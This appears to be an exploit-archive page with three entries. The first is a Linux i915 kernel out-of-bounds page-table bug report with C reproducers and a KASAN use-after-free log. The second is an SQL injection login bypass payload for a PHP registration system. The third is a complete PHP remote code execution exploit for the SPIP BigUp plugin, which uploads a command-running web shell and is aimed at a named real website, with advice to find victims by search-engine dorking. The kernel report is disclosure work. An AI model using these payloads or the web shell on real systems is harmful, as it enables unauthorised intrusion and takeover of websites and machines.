    I found a bug in the i915 code that allows a process with access to a rendernode (/dev/dri/renderD128) to corrupt kernel memory.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-08-28.Summaryvm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limitthe size to area->vm_end - {address passed to remap_io_mapping} instead ofarea->vm_end - area->vm_start.Bug description[For people reading this bug report who are not i915 experts: I highly recommendfirst reading sima's "i915/GEM Crashcourse" athttps://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn'thave understood what's going on in this code without reading that.]I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c.PTEs pointing into the GTT MMIO window are written as follows:/\* Now pin it into the GTT as needed \*/  vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,                                    PIN_MAPPABLE |                                    PIN_NONBLOCK /\* NOWARN \*/ |                                    PIN_NOEVICT);  if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {          /\* Use a partial view if it is bigger than available space \*/          struct i915_gtt_view view =                  compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);  [...]          vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);  [...]  }  [...]  /\* Finally, remap it using the new GTT offset \*/  ret = remap_io_mapping(area,                         area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),                         (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,                         min_t(u64, vma->size, area->vm_end - area->vm_start),                         &ggtt->iomap);  In the case where the first i915_gem_object_ggtt_pin_ww() call refuses tomap the whole object into the GTT MMIO window, for example because theobject is too big to fit into the window, a subrange of the object is mappedinstead. When this happens and the subrange is not at the start of the VMA,vma->gtt_view.partial.offset is nonzero.In this case, the size parameter passed to remap_io_mapping() is calculatedwrong: It is limited to the size of the VMA (area->vm_end - area->vm_start),but with an address that is higher than where the VMA starts(area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so theend address is only limited toarea->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).When the VMA covers the whole object, this has no bad consequences because ofthe min_t(); but if the VMA is shorter than the object, PTEs can be writtenout of bounds.This can be tested with the following reproducer - on my system it causes"BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducertries to exit:// written for a device with Xe Graphics (TGL GT2)    #define _GNU_SOURCE  #include <err.h>  #include <fcntl.h>  #include <stdio.h>  #include <inttypes.h>  #include <sys/ioctl.h>  #include <sys/mman.h>  #include <drm/i915_drm.h>    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    #define MiB \*(1024\*1024)    void poke(volatile char \*p) {    printf("poking      %p\n", p);    \*p = 1;  }    int main(void) {    int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);    #define MAP_SIZE (128 MiB - 0x80000)    volatile char \*map = (volatile char \*)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));    printf("mapped from %p\n", map);    poke(map + MAP_SIZE - 0x1000);    poke(map);    printf("mapped to   %p\n", map + MAP_SIZE);  }  Code historyThe current form of the buggy code is from commit c58305af1835 ("drm/i915: Useremap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), butI think back then it was unreachable because the code for constructing a partialview limited the partial view's size based on the VMA bounds back then:                view.params.partial.size =                          min_t(unsigned int, chunk_size,                                (area->vm_end - area->vm_start) / PAGE_SIZE -                                view.params.partial.offset);  This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partialview against the object not vma", first in v4.11). I suspect the bug becamehittable after that point.Most places in the kernel that install PFNMAP PTEs use helpers likeremap_pfn_range() that make sure the passed range fits into the specified VMA;but it looks like i915 doesn't use those because it wants to be able to clobberexisting PTEs, which the usual helpers treat as an error.(See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").)i915 instead uses its own helper remap_io_mapping(), which just writes PTEsin the specified virtual address range.ExploitabilityOne consequence of this bug is that, because PFNMAP PTEs are written outside theregion covered by the VMA, the MM subsystem can't shoot them down when thedriver wants to revoke userspace's access to the region. So this could probablybe used to gain access to memory that is later mapped into the GTT in the MMIOwindow - but I don't know enough about i915 to tell whether that is bad orwhether shaders always have access to all GTT memory anyway.Probably another consequence would be that if you had a VMA at the end of theuserspace virtual address space, you could get memory mapped into the kernelhalf of memory? But that probably wouldn't lead to anything overly bad...The one way I know of to turn this bug into something that is definitely badis to turn it into page table UAF, like inhttps://crbug.com/project-zero/2350:When you're only holding the mmap_lock in read mode (like in a page faulthandler), page tables that are not needed by any VMA can be freed concurrently.So if we have one GTT-backed VMA directly ahead of a second VMA, and thenconcurrently trigger a fault in the GTT-backed VMA while unmapping the secondVMA, the out-of-bounds page table access off of the first VMA can walk pagetables that are concurrently freed.I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAFaccess) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCUgrace periods much shorter at the expense of performance, which makes it easierto detect use-after-free bugs for objects that are RCU-freed), using thefollowing reproducer, running on a system with Xe Graphics (TGL GT2):// written for a device with Xe Graphics (TGL GT2)    #define _GNU_SOURCE  #include <pthread.h>  #include <err.h>  #include <fcntl.h>  #include <stdio.h>  #include <inttypes.h>  #include <sys/ioctl.h>  #include <sys/mman.h>  #include <drm/i915_drm.h>    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    #define MiB \*(1024\*1024)    // virtual address at the boundary between PGD entries  #define PGD_BOUNDARY_ADDR 0x8000000000    #define MAP_SIZE (128 MiB - 0x80000)  #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)    #define FLIPPER_MAP_SIZE 0x200000    static void \*flipper_thread_fn(void \*dummy) {    int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = FLIPPER_MAP_SIZE    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("flipper created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);    while (1) {      SYSCHK(mmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));      SYSCHK(munmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));    }    return NULL;  }    int main(void) {    pthread_t flipper_thread;    if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))      errx(1, "pthread_create");      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);      while (1) {      SYSCHK(mmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));      \*(volatile char \*)(PGD_BOUNDARY_ADDR - 0x1000);      SYSCHK(munmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE));    }  }  With that, I quickly got a KASAN splat (guess unwind lines removed):[  906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF  [  906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF  [  906.819808] ==================================================================  [  906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)  [  906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809    [  906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3  [  906.819835] Hardware name: [...]  [  906.819838] Call Trace:  [  906.819839]  <TASK>  [  906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))  [  906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  [  906.819859] kasan_report (mm/kasan/report.c:603)  [  906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)  [  906.819869] __pte_alloc (mm/memory.c:445)  [  906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)  [  906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)  [  906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)  [  906.819924] __do_fault (mm/memory.c:4531)  [  906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)  [  906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)  [  906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)  [  906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)  [  906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)  [  906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)  [  906.819967] RIP: 0033:0x561a370af516  [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8  All code  ========     0:   48 83 7d e8 ff          cmpq   $0xffffffffffffffff,-0x18(%rbp)     5:   75 19                   jne    0x20     7:   48 8d 05 26 0d 00 00    lea    0xd26(%rip),%rax        # 0xd34     e:   48 89 c6                mov    %rax,%rsi    11:   bf 01 00 00 00          mov    $0x1,%edi    16:   b8 00 00 00 00          mov    $0x0,%eax    1b:   e8 64 fb ff ff          call   0xfffffffffffffb84    20:   48 b8 00 f0 ff ff 7f    movabs $0x7ffffff000,%rax    27:   00 00 00    2a:\*  0f b6 00                movzbl (%rax),%eax              <-- trapping instruction    2d:   be 00 00 f8 07          mov    $0x7f80000,%esi    32:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax    39:   00 00 00    3c:   48 89 c7                mov    %rax,%rdi    3f:   e8                      .byte 0xe8    Code starting with the faulting instruction  ===========================================     0:   0f b6 00                movzbl (%rax),%eax     3:   be 00 00 f8 07          mov    $0x7f80000,%esi     8:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax     f:   00 00 00    12:   48 89 c7                mov    %rax,%rdi    15:   e8                      .byte 0xe8  [  906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213  [  906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3  [  906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000  [  906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000  [  906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000  [  906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020  [  906.819987]  </TASK>    [  906.819990] The buggy address belongs to the physical page:  [  906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919  [  906.819994] flags: 0x4000000000000000(zone=1)  [  906.819997] page_type: 0xffffffff()  [  906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000  [  906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000  [  906.820004] page dumped because: kasan: bad access detected    [  906.820006] Memory state around the buggy address:  [  906.820008]  ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [  906.820010]  ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [  906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820013]                    ^  [  906.820014]  ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820016]  ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820017] ==================================================================  This bug is probably not very interesting on Linux servers, since access tothe render node is typically only granted to UIDs who have locally signed into a machine; but it is probably relevant for things like ChromeOS, and maybealso for escaping from some types of sandboxed desktop applications?Related CVE Number: CVE-2024-42259.Found by: jannh@google.com

Linux i915 PTE Use-After-Free

Registration and Login System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Registration and Login System v1.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/User-Registration-and-login-System-with-admin-panel.zip                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/loginsystem/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Registration And Login System 1.0 SQL Injection

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google